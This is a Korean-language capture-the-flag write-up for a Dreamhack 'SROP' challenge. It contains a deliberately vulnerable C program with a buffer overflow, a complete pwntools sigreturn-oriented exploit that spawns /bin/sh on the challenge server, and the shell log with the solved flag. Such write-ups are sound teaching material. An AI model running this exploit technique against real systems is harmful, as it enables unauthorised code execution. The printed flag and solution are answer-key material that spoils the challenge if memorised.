문제 코드
#include <unistd.h>
int gadget() {
asm("pop %rax;"
"syscall;"
"ret" );
}
int main()
{
char buf[16];
read(0, buf ,1024);
}
- buf 크기가 16 바이트인데 1024 바이트 만큼 입력을 받고 있어서 버퍼 오버플로우가 발생합니다.
- gadget 함수를 이용해 SROP 공격을 할 수 있습니다.
보호 기법
kali@kali ~/wargame/dreamhack/SROP checksec srop
[*] '/home/kali/wargame/dreamhack/SROP/srop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
익스플로잇 코드
from pwn import *
context.arch = "x86_64"
p = remote("host3.dreamhack.games", 21552)
elf = ELF("./srop")
gadget = next(elf.search(asm("pop rax; syscall")))
syscall = next(elf.search(asm("syscall")))
read_got = elf.got['read']
_start = elf.symbols['_start']
binsh = b"/bin/sh\x00"
bss = elf.bss()
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = bss
frame.rdx = 0x1000
frame.rip = syscall
frame.rsp = bss
payload = b"A"*16
payload += b"B"*8
payload += p64(gadget)
payload += p64(15)
payload += bytes(frame)
p.sendline(payload)
frame2 = SigreturnFrame()
frame2.rip = syscall
frame2.rax = 0x3b
frame2.rdi = bss + 0x108
frame2.rsp = bss + 0x500
rop = p64(gadget)
rop += p64(15)
rop += bytes(frame2)
rop += binsh
p.sendline(rop)
p.interactive()
익스플로잇
kali@kali ~/wargame/dreamhack/SROP python3 remote.py
[+] Opening connection to host3.dreamhack.games on port 21552: Done
[*] '/home/kali/wargame/dreamhack/SROP/srop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Switching to interactive mode
$
$ ls
flag
srop
$ cat flag
DH{4a177764b353c1295afec0071a8e7951}
